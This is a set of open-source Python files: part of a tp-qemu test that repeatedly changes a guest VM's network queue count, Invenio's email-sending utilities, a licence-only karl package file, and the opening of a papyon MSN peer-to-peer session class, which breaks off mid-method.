queues_info = queues_reg.findall(" ".join(nic_mq_info.splitlines()))
if len(queues_info) != 2:
err_msg = "Oops, get guest queues info failed, "
err_msg += "make sure your guest support MQ.\n"
err_msg += "Check cmd is: '%s', " % mq_get_cmd
err_msg += "Command output is: '%s'." % nic_mq_info
raise error.TestNAError(err_msg)
return [int(x) for x in queues_info]
def enable_multi_queues(vm):
sess = vm.wait_for_serial_login(timeout=login_timeout)
error.context("Enable multi queues in guest.", logging.info)
for nic_index, nic in enumerate(vm.virtnet):
ifname = utils_net.get_linux_ifname(sess, nic.mac)
queues = int(nic.queues)
change_queues_number(sess, ifname, queues)
def ping_test(dest_ip, ping_time, lost_ratio, session=None):
status, output = utils_test.ping(dest=dest_ip, timeout=ping_time,
session=session)
packets_lost = utils_test.get_loss_ratio(output)
if packets_lost > lost_ratio:
err = " %s%% packets lost during ping. " % packets_lost
err += "Ping command log:\n %s" % "\n".join(output.splitlines()[-3:])
raise error.TestFail(err)
error.context("Init guest and try to login", logging.info)
login_timeout = int(params.get("login_timeout", 360))
bg_stress_test = params.get("run_bgstress")
bg_stress_run_flag = params.get("bg_stress_run_flag")
vm = env.get_vm(params["main_vm"])
vm.verify_alive()
vm.wait_for_login(timeout=login_timeout)
if params.get("pci_nomsi", "no") == "yes":
error.context("Disable pci msi in guest", logging.info)
utils_test.update_boot_option(vm, args_added="pci=nomsi")
vm.wait_for_login(timeout=login_timeout)
enable_multi_queues(vm)
session_serial = vm.wait_for_serial_login(timeout=login_timeout)
s_session = None
bg_ping = params.get("bg_ping")
b_ping_lost_ratio = int(params.get("background_ping_package_lost_ratio", 5))
f_ping_lost_ratio = int(params.get("final_ping_package_lost_ratio", 5))
guest_ip = vm.get_address()
b_ping_time = int(params.get("background_ping_time", 60))
f_ping_time = int(params.get("final_ping_time", 60))
bg_test = None
try:
ifnames = []
for nic_index, nic in enumerate(vm.virtnet):
ifname = utils_net.get_linux_ifname(session_serial,
vm.virtnet[nic_index].mac)
ifnames.append(ifname)
if bg_stress_test:
error.context("Run test %s background" % bg_stress_test,
logging.info)
stress_thread = ""
wait_time = float(params.get("wait_bg_time", 60))
env[bg_stress_run_flag] = False
stress_thread = utils.InterruptedThread(
utils_test.run_virt_sub_test, (test, params, env),
{"sub_type": bg_stress_test})
stress_thread.start()
if bg_stress_run_flag:
utils_misc.wait_for(lambda: env.get(bg_stress_run_flag),
wait_time, 0, 5,
"Wait %s start background" % bg_stress_test)
if bg_ping == "yes":
error.context("Ping guest from host", logging.info)
args = (guest_ip, b_ping_time, b_ping_lost_ratio)
bg_test = utils.InterruptedThread(ping_test, args)
bg_test.start()
error.context("Change queues number repeatly", logging.info)
repeat_counts = int(params.get("repeat_counts", 10))
for nic_index, nic in enumerate(vm.virtnet):
if "virtio" not in nic['nic_model']:
continue
queues = int(vm.virtnet[nic_index].queues)
if queues == 1:
logging.info("Nic with single queue, skip and continue")
continue
ifname = ifnames[nic_index]
default_change_list = xrange(1, int(queues + 1))
change_list = params.get("change_list")
if change_list:
change_list = change_list.split(",")
else:
change_list = default_change_list
for repeat_num in xrange(1, repeat_counts + 1):
error.context("Change queues number -- %sth" % repeat_num,
logging.info)
try:
queues_status = get_queues_status(session_serial, ifname)
for q_number in change_list:
queues_status = change_queues_number(session_serial,
ifname,
int(q_number),
queues_status)
except aexpect.ShellProcessTerminatedError:
vm = env.get_vm(params["main_vm"])
session = vm.wait_for_serial_login(timeout=login_timeout)
session_serial = session
queues_status = get_queues_status(session_serial, ifname)
for q_number in change_list:
queues_status = change_queues_number(session_serial,
ifname,
int(q_number),
queues_status)
if params.get("ping_after_changing_queues", "yes") == "yes":
default_host = "www.redhat.com"
try:
ext_host = utils_net.get_host_default_gateway()
except error.CmdError:
logging.warn("Can't get specified host,"
" Fallback to default host '%s'", default_host)
ext_host = default_host
if not ext_host:
# Fallback to a hardcode host, eg:
ext_host = default_host
s_session = vm.wait_for_login(timeout=login_timeout)
txt = "ping %s after changing queues in guest."
error.context(txt, logging.info)
ping_test(ext_host, f_ping_time, f_ping_lost_ratio, s_session)
if bg_stress_test:
env[bg_stress_run_flag] = False
if stress_thread:
error.context("wait for background test finish", logging.info)
try:
stress_thread.join()
except Exception, err:
err_msg = "Run %s test background error!\n "
err_msg += "Error Info: '%s'"
raise error.TestError(err_msg % (bg_stress_test, err))
finally:
if bg_stress_test:
env[bg_stress_run_flag] = False
if session_serial:
session_serial.close()
if s_session:
s_session.close()
if bg_test:
error.context("Wait for background ping test finish.",
logging.info)
try:
bg_test.join()
except Exception, err:
txt = "Fail to wait background ping test finish. "
txt += "Got error message %s" % err
raise error.TestFail(txt)
|
tolimit/tp-qemu
|
qemu/tests/mq_change_qnum.py
|
Python
|
gpl-2.0
| 9,855
|
# -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014, 2015 CERN.
#
# Invenio is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""
Invenio mail sending utilities. send_email() is the main API function
people should be using; just check out its docstring.
"""
__revision__ = "$Id$"
import os
import re
import sys
from cStringIO import StringIO
from time import sleep
import smtplib
import socket
from email import Encoders
from email.Header import Header
from email.MIMEBase import MIMEBase
from email.MIMEImage import MIMEImage
from email.MIMEMultipart import MIMEMultipart
from email.MIMEText import MIMEText
from email.Utils import formatdate
from formatter import DumbWriter, AbstractFormatter
from invenio.access_control_config import CFG_TEMP_EMAIL_ADDRESS
from invenio.config import \
CFG_SITE_SUPPORT_EMAIL, \
CFG_SITE_URL, \
CFG_SITE_LANG, \
CFG_SITE_NAME_INTL, \
CFG_SITE_NAME, \
CFG_SITE_ADMIN_EMAIL, \
CFG_MISCUTIL_SMTP_HOST, \
CFG_MISCUTIL_SMTP_PORT, \
CFG_VERSION, \
CFG_DEVEL_SITE
from invenio.errorlib import register_exception
from invenio.messages import wash_language, gettext_set_language
from invenio.miscutil_config import InvenioMiscUtilError
from invenio.textutils import guess_minimum_encoding
try:
from invenio.config import \
CFG_MISCUTIL_SMTP_USER,\
CFG_MISCUTIL_SMTP_PASS,\
CFG_MISCUTIL_SMTP_TLS
except ImportError:
CFG_MISCUTIL_SMTP_USER = ''
CFG_MISCUTIL_SMTP_PASS = ''
CFG_MISCUTIL_SMTP_TLS = False
def scheduled_send_email(fromaddr,
toaddr,
subject="",
content="",
header=None,
footer=None,
copy_to_admin=0,
attempt_times=1,
attempt_sleeptime=10,
user=None,
other_bibtasklet_arguments=None,
replytoaddr="",
bccaddr="",
):
"""
Like send_email, but send an email via the bibsched
infrastructure.
@param fromaddr: sender
@type fromaddr: string
@param toaddr: list of receivers
@type toaddr: string (comma separated) or list of strings
@param subject: the subject
@param content: the body of the message
@param header: optional header, otherwise default is used
@param footer: optional footer, otherwise default is used
@param copy_to_admin: set to 1 in order to send email the admins
@param attempt_times: try at least n times before giving up sending
@param attempt_sleeptime: number of seconds to sleep between two attempts
@param user: the user name to user when scheduling the bibtasklet. If
None, the sender will be used
@param other_bibtasklet_arguments: other arguments to append to the list
of arguments to the call of task_low_level_submission
@param replytoaddr: [string or list-of-strings] to be used for the
reply-to header of the email (if string, then
receivers are separated by ',')
@param bccaddr: [string or list-of-strings] to be used for BCC header of the email
(if string, then receivers are separated by ',')
@return: the scheduled bibtasklet
"""
from invenio.bibtask import task_low_level_submission
if not isinstance(toaddr, (unicode, str)):
toaddr = ','.join(toaddr)
if not isinstance(replytoaddr, (unicode, str)):
replytoaddr = ','.join(replytoaddr)
toaddr = remove_temporary_emails(toaddr)
if user is None:
user = fromaddr
if other_bibtasklet_arguments is None:
other_bibtasklet_arguments = []
else:
other_bibtasklet_arguments = list(other_bibtasklet_arguments)
if not header is None:
other_bibtasklet_arguments.extend(("-a", "header=%s" % header))
if not footer is None:
other_bibtasklet_arguments.extend(("-a", "footer=%s" % footer))
return task_low_level_submission(
"bibtasklet", user, "-T", "bst_send_email",
"-a", "fromaddr=%s" % fromaddr,
"-a", "toaddr=%s" % toaddr,
"-a", "replytoaddr=%s" % replytoaddr,
"-a", "subject=%s" % subject,
"-a", "content=%s" % content,
"-a", "copy_to_admin=%s" % copy_to_admin,
"-a", "attempt_times=%s" % attempt_times,
"-a", "attempt_sleeptime=%s" % attempt_sleeptime,
"-a", "bccaddr=%s" % bccaddr,
*other_bibtasklet_arguments)
def send_email(fromaddr,
toaddr,
subject="",
content="",
html_content='',
html_images=None,
header=None,
footer=None,
html_header=None,
html_footer=None,
copy_to_admin=0,
attempt_times=1,
attempt_sleeptime=10,
debug_level=0,
ln=CFG_SITE_LANG,
charset=None,
replytoaddr="",
attachments=None,
bccaddr="",
forward_failures_to_admin=True,
):
"""Send a forged email to TOADDR from FROMADDR with message created from subjet, content and possibly
header and footer.
@param fromaddr: [string] sender
@param toaddr: [string or list-of-strings] list of receivers (if string, then
receivers are separated by ','). BEWARE: If more than one recipient is given,
the receivers are put in BCC and To will be "Undisclosed.Recipients:".
@param subject: [string] subject of the email
@param content: [string] content of the email
@param html_content: [string] html version of the email
@param html_images: [dict] dictionary of image id, image path
@param header: [string] header to add, None for the Default
@param footer: [string] footer to add, None for the Default
@param html_header: [string] header to add to the html part, None for the Default
@param html_footer: [string] footer to add to the html part, None for the Default
@param copy_to_admin: [int] if 1 add CFG_SITE_ADMIN_EMAIL in receivers
@param attempt_times: [int] number of tries
@param attempt_sleeptime: [int] seconds in between tries
@param debug_level: [int] debug level
@param ln: [string] invenio language
@param charset: [string] the content charset. By default is None which means
to try to encode the email as ascii, then latin1 then utf-8.
@param replytoaddr: [string or list-of-strings] to be used for the
reply-to header of the email (if string, then
receivers are separated by ',')
@param attachments: list of paths of files to be attached. Alternatively,
every element of the list could be a tuple: (filename, mimetype)
@param bccaddr: [string or list-of-strings] to be used for BCC header of the email
(if string, then receivers are separated by ',')
@param forward_failures_to_admin: [bool] prevents infinite recursion
in case of admin reporting,
when the problem is not in
the e-mail address format,
but rather in the network
If sending fails, try to send it ATTEMPT_TIMES times, and wait for
ATTEMPT_SLEEPTIME seconds in between tries.
e.g.:
send_email('foo.bar@cern.ch', 'bar.foo@cern.ch', 'Let\'s try!', 'check 1234', '<strong>check</strong> <em>1234</em><img src="cid:image1">', {'image1': '/tmp/quantum.jpg'})
@return: [bool]: True if email was sent okay, False if it was not.
"""
if html_images is None:
html_images = {}
if type(toaddr) is str:
toaddr = toaddr.strip().split(',')
toaddr = remove_temporary_emails(toaddr)
if type(bccaddr) is str:
bccaddr = bccaddr.strip().split(',')
usebcc = len(toaddr) > 1 # More than one address, let's use Bcc in place of To
if copy_to_admin:
if CFG_SITE_ADMIN_EMAIL not in toaddr:
toaddr.append(CFG_SITE_ADMIN_EMAIL)
if CFG_DEVEL_SITE: # if we are on a development site, we don't want to send external e-mails
content = """
--------------------------------------------------------------
This message would have been sent to the following recipients:
%s
--------------------------------------------------------------
%s""" % (toaddr, content)
toaddr = CFG_SITE_ADMIN_EMAIL
usebcc = False
body = forge_email(fromaddr, toaddr, subject, content, html_content,
html_images, usebcc, header, footer, html_header,
html_footer, ln, charset, replytoaddr, attachments,
bccaddr)
_ = gettext_set_language(CFG_SITE_LANG)
if attempt_times < 1 or not toaddr:
try:
raise InvenioMiscUtilError(_('The system is not attempting to send an email from %s, to %s, with body %s.') % (fromaddr, toaddr, body))
except InvenioMiscUtilError, exc:
register_exception()
# log('ERR_MISCUTIL_NOT_ATTEMPTING_SEND_EMAIL', fromaddr, toaddr, body)
return False
sent = False
failure_reason = ''
failure_details = ''
while not sent and attempt_times > 0:
try:
server = smtplib.SMTP(CFG_MISCUTIL_SMTP_HOST, CFG_MISCUTIL_SMTP_PORT)
if debug_level > 2:
server.set_debuglevel(1)
else:
server.set_debuglevel(0)
if CFG_MISCUTIL_SMTP_TLS:
server.ehlo()
server.starttls()
server.ehlo()
if CFG_MISCUTIL_SMTP_USER and CFG_MISCUTIL_SMTP_PASS:
server.login(CFG_MISCUTIL_SMTP_USER, CFG_MISCUTIL_SMTP_PASS)
if isinstance(toaddr, basestring):
toaddr = [toaddr]
server.sendmail(fromaddr, toaddr + bccaddr, body)
server.quit()
sent = True
except (smtplib.SMTPException, socket.error) as e:
failure_reason = type(e).__name__
failure_details = str(e)
register_exception()
if debug_level > 1:
try:
raise InvenioMiscUtilError(_('Error in connecting to the SMTP server waiting %s seconds. Exception is %s, while sending email from %s to %s with body %s.') % (attempt_sleeptime, sys.exc_info()[0], fromaddr, toaddr, body))
except InvenioMiscUtilError, exc:
register_exception()
# log('ERR_MISCUTIL_CONNECTION_SMTP', attempt_sleeptime,
# sys.exc_info()[0], fromaddr, toaddr, body)
if not sent:
attempt_times -= 1
if attempt_times > 0: # sleep only if we shall retry again
sleep(attempt_sleeptime)
if not sent:
# report failure to the admin with the intended message, its
# sender and recipients
if forward_failures_to_admin:
# prepend '> ' to every line of the original message
quoted_body = '> ' + '> '.join(body.splitlines(True))
# define and fill in the report template
admin_report_subject = _('Error while sending an email: %s') % (subject)
admin_report_body = _("\nError while sending an email.\n"
"Reason: %s\n"
"Details: %s\n"
"Sender: \"%s\"\n"
"Recipient(s): \"%s\"\n\n"
"The content of the mail was as follows:\n"
"%s") % (failure_reason, failure_details,
fromaddr, ', '.join(toaddr),
quoted_body)
send_email(CFG_SITE_ADMIN_EMAIL, CFG_SITE_ADMIN_EMAIL,
admin_report_subject, admin_report_body,
forward_failures_to_admin=False)
try:
raise InvenioMiscUtilError(_('Error in sending email from %s to %s with body %s.') % (fromaddr, toaddr, body))
except InvenioMiscUtilError, exc:
register_exception()
# log('ERR_MISCUTIL_SENDING_EMAIL', fromaddr, toaddr, body)
return sent
def email_header(ln=CFG_SITE_LANG):
"""The header of the email
@param ln: language
@return: header as a string"""
ln = wash_language(ln)
_ = gettext_set_language(ln)
#standard header
out = """%(hello)s
""" % {
'hello': _("Hello:")
}
return out
def email_html_header(ln=CFG_SITE_LANG):
"""The header of the email
@param ln: language
@return: header as a string"""
ln = wash_language(ln)
_ = gettext_set_language(ln)
#standard header
out = """%(hello)s<br />
""" % {
'hello': _("Hello:")
}
return out
def email_footer(ln=CFG_SITE_LANG):
"""The footer of the email
@param ln: language
@return: footer as a string"""
ln = wash_language(ln)
_ = gettext_set_language(ln)
#standard footer
out = """\n\n%(best_regards)s
--
%(sitename)s <%(siteurl)s>
%(need_intervention_please_contact)s <%(sitesupportemail)s>
""" % {
'sitename': CFG_SITE_NAME_INTL[ln],
'best_regards': _("Best regards"),
'siteurl': CFG_SITE_URL,
'need_intervention_please_contact': _("Need human intervention? Contact"),
'sitesupportemail': CFG_SITE_SUPPORT_EMAIL
}
return out
def email_html_footer(ln=CFG_SITE_LANG):
"""The html footer of the email
@param ln: language
@return: footer as a string"""
ln = wash_language(ln)
_ = gettext_set_language(ln)
#standard footer
out = """<br /><br /><em>%(best_regards)s</em>
<hr />
<a href="%(siteurl)s"><strong>%(sitename)s</strong></a><br />
%(need_intervention_please_contact)s <a href="mailto:%(sitesupportemail)s">%(sitesupportemail)s</a>
""" % {
'sitename': CFG_SITE_NAME_INTL.get(ln, CFG_SITE_NAME),
'best_regards': _("Best regards"),
'siteurl': CFG_SITE_URL,
'need_intervention_please_contact': _("Need human intervention? Contact"),
'sitesupportemail': CFG_SITE_SUPPORT_EMAIL
}
return out
def forge_email(fromaddr, toaddr, subject, content, html_content='',
html_images=None, usebcc=False, header=None, footer=None,
html_header=None, html_footer=None, ln=CFG_SITE_LANG,
charset=None, replytoaddr="", attachments=None, bccaddr=""):
"""Prepare email. Add header and footer if needed.
@param fromaddr: [string] sender
@param toaddr: [string or list-of-strings] list of receivers (if string, then
receivers are separated by ',')
@param usebcc: [bool] True for using Bcc in place of To
@param subject: [string] subject of the email
@param content: [string] content of the email
@param html_content: [string] html version of the email
@param html_images: [dict] dictionary of image id, image path
@param header: [string] None for the default header
@param footer: [string] None for the default footer
@param ln: language
    @param charset: [string] the content charset. By default it is None,
        which means: try to encode the email as ascii, then latin1, then
        utf-8.
@param replytoaddr: [string or list-of-strings] to be used for the
reply-to header of the email (if string, then
receivers are separated by ',')
@param attachments: list of paths of files to be attached. Alternatively,
every element of the list could be a tuple: (filename, mimetype)
@param bccaddr: [string or list-of-strings] to be used for BCC header of the email
(if string, then receivers are separated by ',')
@return: forged email as a string"""
if html_images is None:
html_images = {}
if header is None:
content = email_header(ln) + content
else:
content = header + content
if footer is None:
content += email_footer(ln)
else:
content += footer
if charset is None:
(content, content_charset) = guess_minimum_encoding(content)
else:
content_charset = charset
subject = get_mail_header(subject)
fromaddr = get_mail_header(fromaddr)
toaddr = get_mail_header(toaddr)
replytoaddr = get_mail_header(replytoaddr)
bccaddr = get_mail_header(bccaddr)
toaddr = remove_temporary_emails(toaddr)
if html_content:
if html_header is None:
html_content = email_html_header(ln) + html_content
else:
html_content = html_header + html_content
if html_footer is None:
html_content += email_html_footer(ln)
else:
html_content += html_footer
if charset is None:
(html_content, html_content_charset) = guess_minimum_encoding(html_content)
else:
html_content_charset = charset
msg_root = MIMEMultipart('alternative')
msg_root.preamble = 'This is a multi-part message in MIME format.'
msg_text = MIMEText(content, _charset=content_charset)
msg_root.attach(msg_text)
msg_text = MIMEText(html_content, 'html', _charset=html_content_charset)
if not html_images:
# No image? Attach the HTML to the root
msg_root.attach(msg_text)
else:
# Image(s)? Attach the HTML and image(s) as children of a
# "related" block
msg_related = MIMEMultipart('related')
msg_related.attach(msg_text)
for image_id, image_path in html_images.iteritems():
msg_image = MIMEImage(open(image_path, 'rb').read())
msg_image.add_header('Content-ID', '<%s>' % image_id)
msg_image.add_header('Content-Disposition', 'attachment', filename=os.path.split(image_path)[1])
msg_related.attach(msg_image)
msg_root.attach(msg_related)
else:
msg_root = MIMEText(content, _charset=content_charset)
if attachments:
from invenio.bibdocfile import _mimes, guess_format_from_url
old_msg_root = msg_root
msg_root = MIMEMultipart()
msg_root.attach(old_msg_root)
for attachment in attachments:
            try:
                mime = None
                if type(attachment) in (list, tuple):
                    attachment, mime = attachment
                if mime is None:
## Automatic guessing of mimetype
mime = _mimes.guess_type(attachment)[0]
if mime is None:
ext = guess_format_from_url(attachment)
mime = _mimes.guess_type("foo" + ext)[0]
if not mime:
mime = 'application/octet-stream'
part = MIMEBase(*mime.split('/', 1))
part.set_payload(open(attachment, 'rb').read())
Encoders.encode_base64(part)
part.add_header('Content-Disposition', 'attachment; filename="%s"' % os.path.basename(attachment))
msg_root.attach(part)
except:
register_exception(alert_admin=True, prefix="Can't attach %s" % attachment)
msg_root['From'] = fromaddr
if replytoaddr:
msg_root['Reply-To'] = replytoaddr
if usebcc:
msg_root['Bcc'] = toaddr
msg_root['To'] = 'Undisclosed.Recipients:'
if bccaddr:
msg_root['Bcc'] += ",%s" % (bccaddr,)
else:
msg_root['To'] = toaddr
if bccaddr:
msg_root['Bcc'] = bccaddr
msg_root['Date'] = formatdate(localtime=True)
msg_root['Subject'] = subject
msg_root['User-Agent'] = 'Invenio %s at %s' % (CFG_VERSION, CFG_SITE_URL)
return msg_root.as_string()
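# A minimal usage sketch of forge_email(); the addresses and the attachment
# path below are placeholders, and the call assumes a configured Invenio site
# so that the default header and footer can be built.
def _forge_email_example():
    return forge_email(fromaddr='noreply@example.org',
                       toaddr=['alice@example.org', 'bob@example.org'],
                       subject='Weekly digest',
                       content='Plain-text body.',
                       html_content='<p>HTML body.</p>',
                       replytoaddr='support@example.org',
                       attachments=[('/tmp/report.pdf', 'application/pdf')])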
RE_NEWLINES = re.compile(r'<br\s*/?>|</p>', re.I)
RE_SPACES = re.compile(r'\s+')
RE_HTML_TAGS = re.compile(r'<.+?>')
def email_strip_html(html_content):
"""Strip html tags from html_content, trying to respect formatting."""
html_content = RE_SPACES.sub(' ', html_content)
html_content = RE_NEWLINES.sub('\n', html_content)
html_content = RE_HTML_TAGS.sub('', html_content)
html_content = html_content.split('\n')
out = StringIO()
out_format = AbstractFormatter(DumbWriter(out))
for row in html_content:
out_format.add_flowing_data(row)
out_format.end_paragraph(1)
return out.getvalue()
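# A minimal sketch of what email_strip_html() produces; the exact line
# wrapping depends on DumbWriter, so only a loose containment check is shown.
def _email_strip_html_example():
    text = email_strip_html('<p>Hello <b>world</b></p><br />Goodbye')
    assert 'Hello world' in text and 'Goodbye' in text
    return text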
_RE_TEMPORARY_EMAIL = re.compile(CFG_TEMP_EMAIL_ADDRESS % r'.+?', re.I)
def remove_temporary_emails(emails):
"""
    Removes the temporary emails (which are constructed randomly when a user
    logs in with an external authentication provider that doesn't supply an
    email address) from an email list.
@param emails: email list (if string, then receivers are separated by ',')
@type emails: [str]|str
@rtype: list|str
"""
if type(emails) in (str, unicode):
emails = [email.strip() for email in emails.split(',') if email.strip()]
emails = [email for email in emails if not _RE_TEMPORARY_EMAIL.match(email)]
return ','.join(emails)
else:
return [email for email in emails if not _RE_TEMPORARY_EMAIL.match(email)]
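# A minimal sketch of remove_temporary_emails(); which addresses are dropped
# depends on CFG_TEMP_EMAIL_ADDRESS, so the placeholder addresses below are
# simply normalised and kept.
def _remove_temporary_emails_example():
    kept_string = remove_temporary_emails('alice@example.org, bob@example.org')
    kept_list = remove_temporary_emails(['alice@example.org'])
    return kept_string, kept_list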
def get_mail_header(value):
"""
Return a MIME-compliant header-string. Will join lists of strings
into one string with comma (,) as separator.
"""
if not isinstance(value, basestring):
value = ','.join(value)
try:
value = value.encode('ascii')
except (UnicodeEncodeError, UnicodeDecodeError):
value = Header(value, 'utf-8')
return value
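# A minimal sketch of get_mail_header(): lists are joined with ',' and
# non-ASCII values come back as an email Header encoded as UTF-8.
def _get_mail_header_example():
    joined = get_mail_header(['alice@example.org', 'bob@example.org'])
    encoded = get_mail_header(u'Théo <theo@example.org>')
    return joined, encoded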
|
CERNDocumentServer/invenio
|
modules/miscutil/lib/mailutils.py
|
Python
|
gpl-2.0
| 22,698
|
# Copyright (C) 2008-2009 Open Society Institute
# Thomas Moroz: tmoroz@sorosny.org
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License Version 2 as published
# by the Free Software Foundation. You may not use, modify or distribute
# this program under any other version of the GNU General Public License.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
# a package
|
boothead/karl
|
karl/views/__init__.py
|
Python
|
gpl-2.0
| 864
|
# -*- coding: utf-8 -*-
#
# papyon - a python client library for Msn
#
# Copyright (C) 2007 Ali Sabil <ali.sabil@gmail.com>
# Copyright (C) 2008 Richard Spiers <richard.spiers@gmail.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
from papyon.event import EventsDispatcher
from papyon.msnp2p.constants import *
from papyon.msnp2p.SLP import *
from papyon.msnp2p.transport import *
from papyon.util.parsing import build_account
from papyon.util.timer import Timer
import papyon.util.element_tree as ElementTree
import gobject
import base64
import logging
import random
import uuid
import os
__all__ = ['P2PSession']
logger = logging.getLogger('papyon.msnp2p.session')
MAX_INT32 = 0x7fffffff
MAX_INT16 = 0x7fff
class P2PSession(gobject.GObject, EventsDispatcher, Timer):
__gsignals__ = {
"accepted" : (gobject.SIGNAL_RUN_FIRST,
gobject.TYPE_NONE,
()),
"rejected" : (gobject.SIGNAL_RUN_FIRST,
gobject.TYPE_NONE,
()),
"completed" : (gobject.SIGNAL_RUN_FIRST,
gobject.TYPE_NONE,
(object,)),
"progressed" : (gobject.SIGNAL_RUN_FIRST,
gobject.TYPE_NONE,
(object,)),
"canceled" : (gobject.SIGNAL_RUN_FIRST,
gobject.TYPE_NONE,
()),
"disposed" : (gobject.SIGNAL_RUN_FIRST,
gobject.TYPE_NONE,
())
}
def __init__(self, session_manager, peer, peer_guid=None, euf_guid="",
application_id=0, message=None):
gobject.GObject.__init__(self)
EventsDispatcher.__init__(self)
Timer.__init__(self)
self._session_manager = session_manager
self._transport_manager = session_manager._transport_manager
self._client = session_manager._client
self._peer = peer
self._peer_guid = peer_guid
self._euf_guid = euf_guid
self._application_id = application_id
self._completed = False
self._version = 1
if self._client.profile.client_id.supports_p2pv2 and \
peer.client_capabilities.supports_p2pv2:
self._version = 2
if message is not None:
self._id = message.body.session_id
self._call_id = message.call_id
self._cseq = message.cseq
self._branch = message.branch
self._incoming = True
else:
self._id = self._generate_id()
self._call_id = "{%s}" % uuid.uuid4()
self._cseq = 0
self._branch = "{%s}" % uuid.uuid4()
self._incoming = False
self._session_manager._register_session(self)
def _generate_id(self, max=MAX_INT32):
"""
Returns a random ID.
        @return: a random integer between 1000 and max (MAX_INT32 by default)
@rtype: integer
"""
return random.randint(1000, max)
@property
def id(self):
return self._id
@property
def incoming(self):
return self._incoming
@property
def completed(self):
return self._completed
@property
def call_id(self):
return self._call_id
@property
def peer(self):
return self._peer
@property
def peer_guid(self):
return self._peer_guid
@property
def local_id(self):
if self._version >= 2:
return build_account(self._client.profile.account,
self._client.machine_guid)
return self._client.profile.account
@property
def remote_id(self):
if self._version >= 2:
return build_account(self._peer.account, self._peer_guid)
return self._peer.account
def set_receive_data_buffer(self, buffer, size):
self._transport_manager.register_data_buffer(self.peer,
self.peer_guid, self.id, buffer, size)
def _invite(self, context):
body = SLPSessionRequestBody(self._euf_guid, self._application_id,
context, self._id)
message = SLPRequestMessage(SLPRequestMethod.INVITE,
"MSNMSGR:" + self.remote_id,
to=self.remote_id,
frm=self.local_id,
branch=self._branch,
cseq=self._cseq,
call_id=self._call_id)
message.body = body
self._send_slp_message(message)
self.start_timeout("response", 60)
def _transreq(self):
self._cseq = 0
body = SLPTransportRequestBody(self._id, 0, 1)
message = SLPRequestMessage(SLPRequestMethod.INVITE,
"MSNMSGR:" + self.remote_id,
to=self.remote_id,
frm=self.local_id,
branch=self._branch,
cseq=self._cseq,
call_id=self._call_id)
message.body = body
self._send_slp_message(message)
def _respond(self, status_code):
body = SLPSessionRequestBody(session_id=self._id, capabilities_flags=None,
s_channel_state=None)
self._cseq += 1
response = SLPResponseMessage(status_code,
to=self.remote_id,
frm=self.local_id,
cseq=self._cseq,
branch=self._branch,
call_id=self._call_id)
response.body = body
self._send_slp_message(response)
# close other end points so we are the only one answering
self._close_end_points(status_code)
def _accept(self):
self._respond(200)
def _decline(self, status_code):
self._respond(status_code)
self._dispose()
def _respond_transreq(self, transreq, status, body):
self._cseq += 1
response = SLPResponseMessage(status,
to=self.remote_id,
frm=self.local_id,
cseq=self._cseq,
branch=transreq.branch,
call_id=self._call_id)
response.body = body
self._send_slp_message(response)
def _accept_transreq(self, transreq, bridge, listening, nonce, local_ip,
local_port, extern_ip, extern_port):
body = SLPTransportResponseBody(bridge, listening, nonce, [local_ip],
local_port, [extern_ip], extern_port, self._id, 0, 1)
self._respond_transreq(transreq, 200, body)
def _decline_transreq(self, transreq):
body = SLPTransportResponseBody(session_id=self._id)
self._respond_transreq(transreq, 603, body)
self._dispose()
def _close(self, context=None, reason=None):
body = SLPSessionCloseBody(context=context, session_id=self._id,
reason=reason, s_channel_state=0)
self._cseq = 0
self._branch = "{%s}" % uuid.uuid4()
message = SLPRequestMessage(SLPRequestMethod.BYE,
"MSNMSGR:" + self.remote_id,
to=self.remote_id,
frm=self.local_id,
branch=self._branch,
cseq=self._cseq,
call_id=self._call_id)
message.body = body
self._send_slp_message(message)
self._dispose()
def _close_end_points(self, status):
"""Send BYE to other end points; this client already answered.
@param status: response we sent to the peer"""
if len(self._peer.end_points) > 0:
return # if the peer supports MPOP, let him do the work
for end_point in self._client.profile.end_points.values():
if end_point.id == self._client.machine_guid:
continue
self._close_end_point(end_point, status)
def _close_end_point(self, end_point, status):
reason = (status, self._client.machine_guid)
body = SLPSessionCloseBody(session_id=self._id, reason=reason,
s_channel_state=0)
self._cseq = 0
self._branch = "{%s}" % uuid.uuid4()
message = SLPRequestMessage(SLPRequestMethod.BYE,
"MSNMSGR:" + self._client.profile.account,
to=self._client.profile.account,
frm=self._peer.account,
branch=self._branch,
cseq=self._cseq,
call_id=self._call_id,
on_behalf=self._peer.account)
message.body = body
self._transport_manager.send_slp_message(self._client.profile,
end_point.id, self._application_id, message)
def _dispose(self):
logger.info("Session %s disposed" % self._id)
self.stop_all_timeout()
self._session_manager._transport_manager.cleanup(self.peer,
self.peer_guid, self._id)
self._session_manager._unregister_session(self)
self._emit("disposed")
def _send_slp_message(self, message):
self._transport_manager.send_slp_message(self.peer, self.peer_guid,
self._application_id, message)
def _send_data(self, data):
self._transport_manager.send_data(self.peer, self.peer_guid,
self._application_id, self._id, data)
def _on_slp_message_received(self, message):
if isinstance(message, SLPRequestMessage):
if isinstance(message.body, SLPSessionRequestBody):
self._on_invite_received(message)
elif isinstance(message.body, SLPSessionCloseBody):
self._on_bye_received(message)
else:
